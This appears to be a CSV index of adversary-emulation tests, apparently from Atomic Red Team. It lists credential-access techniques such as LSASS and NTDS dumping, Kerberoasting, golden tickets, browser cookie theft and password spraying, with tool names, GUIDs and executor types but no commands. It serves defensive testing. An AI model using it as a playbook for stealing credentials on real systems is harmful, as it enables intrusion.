credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using keymgr.dll and rundll32.exe,84113186-ed3c-4d0d-8a3c-8980c86c1f4a,powershell
credential-access,T1003,OS Credential Dumping,7,Send NTLM Hash with RPC Test Connection,0b207037-813c-4444-ac3f-b597cf280a67,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1539,Steal Web Session Cookie,3,Steal Chrome Cookies via Remote Debugging (Mac),e43cfdaf-3fb8-4a45-8de0-7eee8741d072,bash
credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
credential-access,T1539,Steal Web Session Cookie,5,Copy Safari BinaryCookies files using AppleScript,e57ba07b-3a33-40cd-a892-748273b9b49a,sh
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,8,"Dumping of SAM, creds, and secrets(Reg Export)",21df41be-cdd8-4695-a650-c3981113aa3c,command_prompt
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,1,Azure - Search Azure AD User Attributes for Passwords,ae9b2e3e-efa1-4483-86e2-fae529ab9fb6,powershell
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
credential-access,T1110.002,Brute Force: Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
credential-access,T1555.001,Credentials from Password Stores: Keychain,1,Keychain Dump,88e1fa00-bf63-4e5b-a3e1-e2ea51c8cca6,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,2,Export Certificate Item(s),1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,3,Import Certificate Item(s) into Keychain,e544bbcb-c4e0-4bd0-b614-b92131635f59,sh
credential-access,T1555.001,Credentials from Password Stores: Keychain,4,Copy Keychain using cat utility,5c32102a-c508-49d3-978f-288f8a9f6617,sh
credential-access,T1003.004,OS Credential Dumping: LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1003.004,OS Credential Dumping: LSA Secrets,2,Dump Kerberos Tickets from LSA using dumper.ps1,2dfa3bff-9a27-46db-ab75-7faefdaca732,powershell
credential-access,T1606.002,Forge Web Credentials: SAML token,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with sh on FreeBSD (Local),fa37b633-e097-4415-b2b8-c5bf4c86e423,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,4,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
credential-access,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
credential-access,T1040,Network Sniffing,4,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
credential-access,T1040,Network Sniffing,5,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
credential-access,T1040,Network Sniffing,6,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
credential-access,T1040,Network Sniffing,7,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
credential-access,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
credential-access,T1040,Network Sniffing,9,Filtered Packet Capture macOS using /dev/bpfN with sudo,e2480aee-23f3-4f34-80ce-de221e27cd19,bash
credential-access,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
credential-access,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
credential-access,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
credential-access,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
credential-access,T1040,Network Sniffing,15,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
credential-access,T1040,Network Sniffing,16,PowerShell Network Sniffing,9c15a7de-de14-46c3-bc2a-6d94130986ae,powershell
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
credential-access,T1552.002,Unsecured Credentials: Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
credential-access,T1556.002,Modify Authentication Process: Password Filter DLL,2,Install Additional Authentication Packages,91580da6-bc6e-431b-8b88-ac77180005f2,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
credential-access,T1558.004,Steal or Forge Kerberos Tickets: AS-REP Roasting,3,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,8c385f88-4d47-4c9a-814d-93d9deec8c71,powershell
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
credential-access,T1555,Credentials from Password Stores,6,WinPwn - Loot local Credentials - lazagne,079ee2e9-6f16-47ca-a635-14efcd994118,powershell
credential-access,T1555,Credentials from Password Stores,7,WinPwn - Loot local Credentials - Wifi Credentials,afe369c2-b42e-447f-98a3-fb1f4e2b8552,powershell
credential-access,T1555,Credentials from Password Stores,8,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,db965264-3117-4bad-b7b7-2523b7856b92,powershell
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1552,Unsecured Credentials,2,Search for Passwords in Powershell History,f9c3d0ab-479b-4019-945f-22ace2b1731a,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,5,Simulating access to Opera Login Data,28498c17-57e4-495a-b0be-cc1e36de408b,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,10,Stage Popular Credential Files for Exfiltration,f543635c-1705-42c3-b180-efd6dc6e7ee7,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,16,BrowserStealer (Chrome / Firefox / Microsoft Edge),6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd,powershell
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,17,Dump Chrome Login Data with esentutl,70422253-8198-4019-b617-6be401b49fce,command_prompt
credential-access,T1552.004,Unsecured Credentials: Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with CP (freebsd),12e4a260-a7fd-4ed8-bf18-1a28c1395775,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,Copy Private SSH Keys with rsync (freebsd),922b1080-0b95-42b0-9585-b9a5ea0af044,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,8,Copy the users GnuPG directory with rsync (freebsd),b05ac39b-515f-48e9-88e9-2f141b5bcad0,sh
credential-access,T1552.004,Unsecured Credentials: Private Keys,9,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,10,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,11,CertUtil ExportPFX,336b25bf-4514-4684-8924-474974f28137,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,12,Export Root Certificate with Export-PFXCertificate,7617f689-bbd8-44bc-adcd-6f8968897848,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,13,Export Root Certificate with Export-Certificate,78b274f8-acb0-428b-b1f7-7b0d0e73330a,powershell
credential-access,T1552.004,Unsecured Credentials: Private Keys,14,Export Certificates with Mimikatz,290df60e-4b5d-4a5e-b0c7-dc5348ea0c86,command_prompt
credential-access,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,11,Dump LSASS with createdump.exe from .Net v5,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,13,Dump LSASS.exe using lolbin rdrleakdiag.exe,47a539d1-61b9-4364-bf49-a68bc2a95ef0,powershell
credential-access,T1003.001,OS Credential Dumping: LSASS Memory,14,Dump LSASS.exe Memory through Silent Process Exit,eb5adf16-b601-4926-bca7-dad22adffb37,command_prompt
credential-access,T1110.003,Brute Force: Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
credential-access,T1110.003,Brute Force: Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Brute Force: Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1110.003,Brute Force: Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
credential-access,T1110.003,Brute Force: Password Spraying,6,Password Spray Invoke-DomainPasswordSpray Light,b15bc9a5-a4f3-4879-9304-ea0011ace63a,powershell
credential-access,T1110.003,Brute Force: Password Spraying,7,Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365),f3a10056-0160-4785-8744-d9bd7c12dc39,powershell
credential-access,T1110.003,Brute Force: Password Spraying,8,Password Spray using Kerbrute Tool,c6f25ec3-6475-47a9-b75d-09ac593c5ecb,powershell
credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
credential-access,T1003.005,OS Credential Dumping: Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
credential-access,T1558.001,Steal or Forge Kerberos Tickets: Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
credential-access,T1649,Steal or Forge Authentication Certificates,1,Staging Local Certificates via Export-Certificate,eb121494-82d1-4148-9e2b-e624e03fbf3d,powershell
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,37807632-d3da-442e-8c2e-00f44928ff8f,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,2,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,4,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,5,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,7,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,8,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,9,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,10,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,11,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,12,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,13,List Credential Files via PowerShell,0d4f2281-f720-4572-adc8-d5bb1618affe,powershell
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,14,List Credential Files via Command Prompt,b0cdacf6-8949-4ffe-9274-a9643a788e55,command_prompt
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,15,Find Azure credentials,a8f6148d-478a-4f43-bc62-5efee9f931a4,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,16,Find GCP credentials,aa12eb29-2dbb-414e-8b20-33d34af93543,sh
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,17,Find OCI credentials,9d9c22c9-fa97-4008-a204-478cf68c40af,sh
credential-access,T1528,Steal Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
credential-access,T1528,Steal Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
credential-access,T1552.006,Unsecured Credentials: Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
credential-access,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
credential-access,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
credential-access,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
credential-access,T1110.004,Brute Force: Credential Stuffing,3,SSH Credential Stuffing From FreeBSD,a790d50e-7ebf-48de-8daa-d9367e0911d4,sh
credential-access,T1110.004,Brute Force: Credential Stuffing,4,Brute Force:Credential Stuffing using Kerbrute Tool,4852c630-87a9-409b-bb5e-5dc12c9ebcde,powershell
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
credential-access,T1187,Forced Authentication,3,Trigger an authenticated RPC call to a target server with no Sign flag set,81cfdd7f-1f41-4cc5-9845-bb5149438e37,powershell
credential-access,T1555.006,Credentials from Password Stores: Cloud Secrets Management Stores,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",2,Access /etc/master.passwd (Local),5076874f-a8e6-4077-8ace-9e5ab54114a5,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",3,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",4,"Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,sh
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh
credential-access,T1558.002,Steal or Forge Kerberos Tickets: Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
credential-access,T1555.004,Credentials from Password Stores: Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
credential-access,T1003.003,OS Credential Dumping: NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
credential-access,T1003.003,OS Credential Dumping: NTDS,9,Create Volume Shadow Copy with diskshadow,b385996c-0e7d-4e27-95a4-aca046b119a7,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497-99ac-8e7817105b55,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
credential-access,T1558.003,Steal or Forge Kerberos Tickets: Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
credential-access,T1003.006,OS Credential Dumping: DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
credential-access,T1003.006,OS Credential Dumping: DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
credential-access,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Kubernetes List Secrets,3,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt
